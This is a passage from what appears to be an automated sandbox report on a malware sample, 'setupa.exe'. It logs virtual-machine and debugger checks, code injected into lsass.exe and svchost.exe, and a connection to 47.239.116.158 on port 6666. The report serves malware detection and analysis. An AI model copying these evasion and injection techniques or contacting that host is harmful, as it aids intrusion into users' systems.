                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\Wbem\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\Desktop\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\Wbem\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\OpenSSH\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\SYSTEM32\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\Desktop\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\OpenSSH\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | Code function: LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE
                      Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 401
                      Source: C:\Windows\SysWOW64\svchost.exe | Window / User API: threadDelayed 3327
                      Source: C:\Windows\SysWOW64\svchost.exe | Window / User API: threadDelayed 3035
                      Source: C:\Windows\SysWOW64\svchost.exe | Window / User API: threadDelayed 2494
                      Source: C:\Windows\SysWOW64\svchost.exe | Window / User API: threadDelayed 3782
                      Source: C:\Windows\SysWOW64\svchost.exe | Window / User API: threadDelayed 2961
                      Source: C:\Windows\SysWOW64\svchost.exe | Window / User API: threadDelayed 2289
                      Source: C:\Program Files\upupoo-classicshell.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_3-28772)
                      Source: C:\Users\user\Desktop\setupa.exe | API coverage: 2.8 %
                      Source: C:\Program Files\upupoo-classicshell.exe | API coverage: 7.2 %
                      Source: C:\Users\user\Desktop\setupa.exe TID: 4956 | Thread sleep time: -55000s >= -30000s [2 identical entries]
                      Source: C:\Users\user\Desktop\setupa.exe TID: 2576 | Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\lsass.exe TID: 5496 | Thread sleep count: 401 > 30
                      Source: C:\Windows\System32\lsass.exe TID: 5496 | Thread sleep time: -40100s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588 | Thread sleep time: -3327000s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6448 | Thread sleep time: -30350s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588 | Thread sleep time: -2494000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6396 | Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2172 | Thread sleep time: -3782000s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2172 | Thread sleep time: -2289000s >= -30000s
                      Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed [2 identical entries]
                      Source: C:\Windows\SysWOW64\svchost.exe | Thread sleep count: Count: 3035 delay: -10
                      Source: C:\Windows\SysWOW64\svchost.exe | Thread sleep count: Count: 2961 delay: -10
                      Source: C:\Windows\SysWOW64\svchost.exe | File Volume queried: C:\ FullSizeInformation [4 identical entries]
                      Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFD2188 FindFirstFileExW,1_2_00000140ADFD2188
                      Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC8F84 FindFirstFileExW,1_2_00000140ADFC8F84
                      Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C22BE0 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,_wcschr,_wcschr,FindFirstFileW,FindClose,3_2_00C22BE0
                      Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642CDE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE [2 identical entries]
                      Source: C:\Users\user\Desktop\setupa.exe | Thread delayed: delay time: 55000 [2 identical entries]
                      Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 30000
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware
                      Source: WerFault.exe, 00000007.00000002.2356508697.0000000005F89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
                      Source: svchost.exe, 00000009.00000002.3361939170.000001428A88A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@Hyper-V RAW%\System32\fveui.dll,-843
                      Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: setupa.exe, 00000000.00000002.2202710108.000001F5DCD67000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.2353068081.0000000003170000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.2352408203.0000000003170000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.2355402640.0000000003170000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3348244944.000002D753EDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3345971023.000002D753E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.2866918366.000001428B10C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.2855715430.000001428A8A8000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 0000000E.00000003.2341837190.0000000002D72000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 0000000E.00000003.2341586677.0000000002D02000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 0000000E.00000003.2341214669.0000000002D72000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 165, 125, 32, 35, 82, 178, 69, 78hgfs.sys#
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
                      Source: setupa.exe | Binary or memory string: vmhgfs.sys
                      Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
                      Source: setupa.exe | Binary or memory string: NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm5678901234+/\/\/GETvmmouse.sysvmhgfs.sysvm3dmp.sysvmu**mouse.sysvmx_svga.sysvmxnet.sysvmci.sysVBoxMouse.sysVBoxGuest.sysVBoxSF.sys
                      Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: setupa.exe | Binary or memory string: vmmouse.sys
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmci0J
                      Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: setupa.exe, 00000000.00000003.2089059856.000001F5DCB53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Windows\System32\OpenSSH\VBoxMouse.sys
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
                      Source: lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
                      Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: setupa.exe | Binary or memory string: VBoxMouse.sys
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: indows\SYSTEM32\VBoxSF.sys5
                      Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: lsass.exe, 00000001.00000002.3345795453.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090385833.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3342483276.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.2220057667.000001428A88A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3342765542.0000000002C00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
                      Source: setupa.exe, 00000000.00000003.2089059856.000001F5DCB53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Windows\System32\OpenSSH\VBoxGuest.syso
                      Source: Amcache.hve.7.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
                      Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWM
                      Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: WerFault.exe, 00000007.00000003.2352408203.0000000003159000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.2353068081.000000000315A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.2355402640.0000000003159000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWV:9
                      Source: svchost.exe, 00000008.00000003.2297410444.000002D754C6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
                      Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
                      Source: setupa.exe | Binary or memory string: VBoxSF.sys
                      Source: setupa.exe | Binary or memory string: VBoxGuest.sys
Source: C:\Windows\System32\lsass.exe | API call chain: ExitProcess graph end node graph_1-7986
Source: C:\Users\user\Desktop\setupa.exe | Process information queried: ProcessInformation
Source: C:\Program Files\upupoo-classicshell.exe | Process queried: DebugPort
Source: C:\Program Files\upupoo-classicshell.exe | Process queried: DebugPort
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Process queried: DebugPort
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Process queried: DebugPort
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: 11_2_10003C74 ___scrt_fastfail,__RTC_Initialize,___scrt_initialize_default_local_stdio_options,LdrInitializeThunk, 11_2_10003C74
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964437C LoadLibraryW,IsDebuggerPresent,GetProcAddress,IsDebuggerPresent,GetCurrentProcess,FreeLibrary, 0_2_00007FF68964437C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E0059B VirtualProtect ?,-00000001,00000104,? 4_2_04E0059B
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689641361 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary, 0_2_00007FF689641361
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0B0277 mov eax, dword ptr fs:[00000030h] 3_2_6E0B0277
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_10007497 mov eax, dword ptr fs:[00000030h] 3_2_10007497
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00170000 mov eax, dword ptr fs:[00000030h] 4_2_00170000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A000DB mov eax, dword ptr fs:[00000030h] 4_2_02A000DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C700CD mov eax, dword ptr fs:[00000030h] 4_2_04C700CD
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: 11_2_10007497 mov eax, dword ptr fs:[00000030h] 11_2_10007497
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_028F0000 mov eax, dword ptr fs:[00000030h] 12_2_028F0000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02ED00DB mov eax, dword ptr fs:[00000030h] 12_2_02ED00DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_051300CD mov eax, dword ptr fs:[00000030h] 12_2_051300CD
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6897A84F0 GetTimeZoneInformation,GetProcessHeap, 0_2_00007FF6897A84F0
Source: C:\Users\user\Desktop\setupa.exe | Process token adjusted: Debug
Source: C:\Windows\System32\lsass.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896461B8 __scrt_fastfail,IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6896461B8
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642905 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF689642905
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC5B2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00000140ADFC5B2C
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFD20A8 SetUnhandledExceptionFilter, 1_2_00000140ADFD20A8
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC1B74 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00000140ADFC1B74
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C21CE0 ?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,GetModuleHandleW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?WaitDllInitThread@@YAXXZ,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLogToFile@@YAXPB_W0ZZ,MessageBoxW,_memset,DoEnvironmentSubstW,GetFileAttributesW,GetModuleFileNameW,CoInitialize,ShellExecuteW,CoUninitialize,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,RegCloseKey,?DllGetSettingInt@@YAHPB_W@Z,Sleep,RegCloseKey,?WaitDllInitThread@@YAXXZ,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,?DllGetSettingInt@@YAHPB_W@Z,Sleep,?WaitDllInitThread@@YAXXZ,RegSetValueExW,_memset,DoEnvironmentSubstW,DoEnvironmentSubstW,_memset,DoEnvironmentSubstW,_memset,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,FormatMessageW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,RegCloseKey,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllExecuteNamedCommand@@YA_NPB_W@Z,PeekMessageW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,CoUninitialize,?WaitDllInitThread@@YAXXZ,GetCurrentDirectoryW,PathAppendW,PathAddExtensionW,LoadLibraryExW,?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,GetModuleFileNameW,PathFindFileNameW,SetCurrentDirectoryW,CoInitialize,SHEvaluateSystemCommandTemplate,_memset,ShellExecuteExW,CoUninitialize,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllImportSettingsXml@@YA_NPB_W@Z,CoUninitialize,CoInitialize,?DllExportSettingsXml@@YA_NPB_W@Z,CoUninitialize,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,SetUnhandledExceptionFilter,GetUserNameW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserObjectInformationW,_malloc,GetUserObjectInformationW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,FindWindowExW,FindWindowExW,GetWindowThreadProcessId,CreateMutexW,GetLastError,GetLastError,GetLastError,AllowSetForegroundWindow,FindWindowW,AllowSetForegroundWindow,?FindTaskBar@@YAPAUHWND__@@K@Z,RegisterWindowMessageW,PostMessageW,WaitForSingleObject,ReleaseMutex,?DllLogToFile@@YAXPB_W0ZZ,GetDesktopWindow,FindWindowExW,RegisterWindowMessageW,PostMessageW,ReleaseMutex,OleInitialize,?DllUpdateSettings@@ 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C2E8F7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 3_2_00C2E8F7
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C2A1E9 SetUnhandledExceptionFilter, 3_2_00C2A1E9
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C25E64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00C25E64
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C24F90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00C24F90
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0B0FCB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E0B0FCB
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0A8C25 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E0A8C25
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0A9145 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E0A9145
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_1000457B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_1000457B
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_10006E17 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_10006E17
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_10003F7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_10003F7C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02588667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_02588667
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_025868F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_025868F5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFDF60 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle, 4_2_04DFDF60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E01FB7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_04E01FB7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFF05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_04DFF05A
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: 11_2_1000457B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1000457B
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: 11_2_10006E17 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_10006E17
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: 11_2_10003F7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10003F7C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F68667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_02F68667
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F668F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_02F668F5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052BDF60 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle, 12_2_052BDF60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052C1FB7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_052C1FB7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052BF05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_052BF05A

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 47.239.116.158 6666
Source: C:\Users\user\Desktop\setupa.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\setupa.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 140ADF30000 protect: page read and write
Source: C:\Program Files\upupoo-classicshell.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 170000 protect: page execute and read and write
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 28F0000 protect: page execute and read and write
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_10002DC0 Wow64GetThreadContext,VirtualAllocEx,WriteProcessMemory,Wow64SetThreadContext,VirtualFreeEx, 3_2_10002DC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF7830 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, 4_2_04DF7830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B7830 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, 12_2_052B7830
Source: C:\Users\user\Desktop\setupa.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\setupa.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Users\user\Desktop\setupa.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADF30000
